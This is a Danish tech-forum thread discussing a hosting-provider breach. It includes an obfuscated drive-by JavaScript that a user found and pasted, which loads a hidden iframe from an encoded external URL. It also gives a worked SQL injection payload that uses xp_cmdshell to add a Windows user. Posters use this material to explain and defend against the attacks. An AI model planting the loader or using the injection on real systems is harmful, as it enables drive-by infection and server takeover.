Dansk sikkerhedssite overtaget af hackere

Hvordan kan huller i hosting firmaets sikkerhed skabe SQL injection huller i alle deres kunders websites?

Eller kunne angriberne indsætte kode i samtlige kunders databaser ved at udnytte et hul i en kundes? Hvordan er det hosting firmaets skyld?

Jeg mangler nogle informationer for at kunne hitte ud af, hvad der egentlig er sket.

CSIS skriver godt nok, at der er tale om en SQL injektion - men det er ikke noget vi har fået bekræftet fra UnoEuros side. Faktisk har vi fået meget lidt information fra dem.

Vi var egentlig i gang med en flytning allerede, men det hele er ikke på plads lige nu. Det er nogle af deres IIS servere, der blev kompromitteret. Det resulterede i, at det skadelige script blev spyttet ud før headeren på alle de websites, der lå på serverne.

Hvorfor de ikke kunne afskærme mod angrebet i weekenden eller lukke hullet, er stadig et ubesvaret spørgsmål.

Det kan de ikke, CSIS har bare trukket en rigtig rigtig almen teori op at hatten, på et problem som de absolut intet ved noget om.

noget tilsvarende lørdag. Jeg søgte på Google efter WIFi Hopper og var inde på Softsea.com for at læse deres anmeldelse. Jeg fortsatte så med at bladre - der var 5 sider med forskellige anmeldelser - og da jeg kom til side gik der et lille stykke tid og så kom der en advarsel fra IE7s pop-up blocker, at der var "noget" der ville installere software. Jeg kører som begrænset bruger i XP Pro, uden noget anti-virus.

Ctrl-Alt-Del -> Joblist -> Programmer -> Afslut Internet Explorer.

Jeg gik så ind på sitet igen med en BackTrack3 live CD og fik sourcen frem. Nederst på side 5 var der noget der så mystisk ud:

[code=JavaScript]<script language="javascript">
var agt=navigator.userAgent.toLowerCase();
var win=((agt.indexOf("win")!=-1) || (agt.indexOf("32b")!=-1));
var nu='%u0068%u0074%u0074%u0070%u003a%u002f%u002f%u0078%u002d%u0073'+
'%u006b%u0069%u0070%u002e%u0063%u006e%u002f%u0073%u0065%u006f'+
'%u002e%u0070%u0068%u0070';
var ko=unescape(nu);
if (win)
{
var ahw=document.createElement('iframe');
ahw.style.border='0px';ahw.style.width='2px';
ahw.style.height='2px';ahw.src=ko;
document.body.appendChild(ahw);
}
</script>[/code]

Der bliver linket til en side fra Kina. Adressen er kodet med de der "%u00XY" tegn for at prøve at skjule det. Selv om jeg tastede adressen ind kom der nu bare en time-out.

Jeg gjorde Softsea support opmærksom på hvad jeg havde fundet og dagen efter svarede de og takkede for oplysningen.

Ja, linierne bryder andre steder end beregnet. Der er 3 linier og de 2 første skulle ha' brudt hvor der er et "+".

Hej Stig. Du her :-)

Mit indlæg på dk.edb.sikkerhed.virus fra lørdag er ikke at finde på Google. Muligvis fordi det indeholder ovenstående skadelig kode. Din follow-up og de senere indlæg er der, men ikke det første i tråden. Derfor kommer det een gang til her.

PS. Hvordan får jeg vist det på en pæn måde her?

PS. Hvordan får jeg vist det på en pæn måde her?

Ved at sætte din kode indenfor [code=sprog] - læs debatguiden på http://www.version2.dk/debat/guide for understøttede programmeringssprog og andre muligheder for formattering.

Vh
Jan, Version2

PS. Jeg har redigeret dit indlæg, så koden står i et [code=Javascript] afsnit.

Ikke at jeg kender denne sag i detaljer, men generelt kan SQL injections indimellem bruges til at oprette ændre filer i filsystemet.

De fleste databasesystemer giver mulighed for "shell escapes", dvs afvikling af kommandoer i operativsystemet. Således kan problemer med SQL injection udvides til at blive fuldt kompromiteret server.

Løsningen er blandt andet at have begrænset mest muligt i flere niveauer. Spørg dig selv når du designer og udvikler applikationer. SKAL denne bruger BÅDE kunne læse og skrive, og derefter - godt DENNE bruger skal kunne læse og skrive, men hmmm BEHØVER denne bruger så at kunne oprette og slette tabeller osv.

Hvis du gennem hele udviklingen af applikationen begrænser mest muligt anvender du, Principle of least privilege - og DET er noget der virker.

Til SQL injections er det også en fordel at bruge prepared SQL statements, hvor der ikke kan tilføjes SQL, men kun parametre til en prepared SQL statement.

PS Husk OWASP Danmark har møde idag:
http://www.owasp.org/index.php/Denmark#Meeting_in_OWASP-DK_24.2F2_2009_a...
- tilmeld dig ASAP, hvis du ikke har gjort det :-)

De fleste databasesystemer giver mulighed for "shell escapes", dvs afvikling af kommandoer i operativsystemet. Således kan problemer med SQL injection udvides til at blive fuldt kompromiteret server.

Men det er forhåbentlig i selve kommandolinie (eller GUI) klienten, og hverken på serversiden, eller i det client library som webserveren/scripting sproget benytter?

• I så fald burde SQL injections ikke betyde det store for selve OS'et.

Tilfældigt link fundet med google:
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

Der udover en masse andet sjov man kan lave med SQL injections lister den kendte:
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

Dvs hvis en parameter ukritisk bruges i eksempelvis denne SQL:
[code=sql]"SELECT * FROM myTable
WHERE someText =’" & request.form("inputdata") & "’"[/code]
og du indsætter:
[code=sql]’ exec master..xp_cmdshell ’net user test testpass /ADD’ --[/code]
ender du med:
[code=sql]
SELECT * FROM myTable
WHERE someText =’’ exec master..xp_cmdshell
’net user test testpass /ADD’--’
[/code]

Dvs der udføres en vilkårlig kommando når SQL afvikles, nice - eller hvad :-) Koblet med at mange afvikler SQL/applikationen med Admin privilegier, vupti 0wned.
PS Håber alle kodeblokkene vises fornuftigt, ellers søg på SQL injection og exec master..xp_cmdshell

By default it's disabled in SQL Server 2005

Dennis, nu skrev du ikke ret meget ... men aligevel har du fat i noget vigtigt.

10 Der er altid forudsætninger for at et angreb virker.

Goto 10, læs den mindst 3 gange for dig selv.

Når man snakker om et hackerangreb er der en masse forudsætninger der skal være på plads for at det pågældende angreb (eller exploit om man vil) virker.

xp_cmdshell antager at man er på Microsoft SQL server, det lyder måske indlysende, men ikke desto mindre ER det jo en antagelse. Dernæst skal det være en version hvor den pågældende funktion findes og er tilgængelig - og ganske rigtigt er den som default slået fra på SQL server 2005.

Hvis man bruger MySQL, PostgreSQL osv. er det helt andre funktioner. Ligesom det i Perl, PHP, ASP, .NET osv. er helt andre funktioner.

Det vigtigste du skal uddrage er således, et angreb kræver visse forudsætninger for at virke - og kan jeg bare fjerne EEN af de pågælgende forudsætninger fra mit miljø virker angrebet ikke.

Ved defense in depth fjerner man så mange forudsætninger/usikre ting - så der forhåbentlig ikke er nogle huller der kan udnyttes :-)

De fleste nyere versioner af applikationer har bedre sikkerhed, inkl. Microsofts ;-)
(mit eget command injection eksempel som jeg bruger på hackerkurser afvikler jeg stadig på Apache HTTPD 1.3, fordi version 2.0 har bedre sikkerhed og derfor nægter at udføre det usikre :-) )

Mit første eksempel var blot et eksempel på at et angreb, som SQL injection, kan udvides til at gøre mere end "blot at rode i databasen".

Hej Alex,

Det obfuskerede script fortolkes fint igennem IE og sender dig videre til en drive-by side. Jeg kan se at samme script er blevet brugt i forbindelse med masse defacements udført af "JacKal".

Den pågældende server indeholder et exploitkit (jeg tror det er polyexploit) og misbruger bl.a. MS09-002 sårbarheden i IE7.

Disse kits er i stand til at levere payload en gang og hvis et offer besøger siden igen (for at efterforske hvad der skete) så foretages der intet skadeligt. Denne funktion findes i flere kits der kan registrere på IP adresse men også ved at placere en cookie som indlæses hvis du besøger den fjendtlige webside igen. Det forklarer også hvorfor du kan have problemer med at få serveren til at levere payload igen ...

Vi har kigget lidt nærmere på denne sag og der er tilsyneladende mange hosting providere der er blevet ramt i det angreb som også har ramt Unoeuro. Angrebet ser bl.a. ud til at være gennemført ved at injekte indhold igennem usikre CMS systemer. Men som en anden bruger rigtigt anfører er det spekulation da vi ikke er direkte involveret i denne sag.

Venligst
Peter

Jeg tænker nu mest på at det ikke findes i serveren med mindre man gør noget aktivt dumt, i forhold til "almindelige" SQL injections hvor man bare skal have været uopmærksom.

Det er klart at administratoren kan enable den (og af en eller anden grund er der IKKE store "DON'T ENABLE THIS" skilte der blinker rødt overalt i dokumentationen), men jeg regner med at 999/1000 ikke slår det til (og forhåbentlig heller ikke giver websidens SQL bruger CONTROL SERVER rettigheder).

...fordi version 2.0 har bedre sikkerhed og derfor nægter at udføre det usikre :-)

Feje hold! ;)

Tak for linket.

Jeg kiggede faktisk efter på bl.a:

http://www.version2.dk/debat

• men fandt ikke noget link til "/guide" på den side.

Var det mon en ide til en forbedring?

@Peter Kruse. Det var osse mit gæt. IE7 var opdateret med de seneste rettelser fra Microsoft WU.

Det er jeg meget omhyggelig med. Jeg bruger som sagt ikke noget anti-virus og det glæder mig, at opdateringen var nok til at forhindre at der skete skade. Det regner jeg da med, men jeg holder øje med computeren et stykke tid. Har skiftet switchen ud med en hub og kører Wireshark på en anden computer, og kigger jævnligt i routerens log.

Det er jo nemt nok at se hvad der skete. Men det Stig Johansen oplyser om "ken.gif" filen forstår jeg ikke. Åbner jeg den i Firefox kommer der bare en meddelse om at filen er beskadiget. Åbner jeg den i Konqueror, kan jeg godt se at der er koder.

Men hvordan bliver koden i "ken.gif" så afviklet i en browser? For det er vel en forudsætning, at den gør?

Men hvordan bliver koden i "ken.gif" så afviklet i en browser? For det er vel en forudsætning, at den gør?

Aah! Nu var der noget der dæmrede. Er der ikke noget med, at Internet Explorer alligevel afvikler kode i non-java file - i hvert fald hvis der er kode i de første X byte?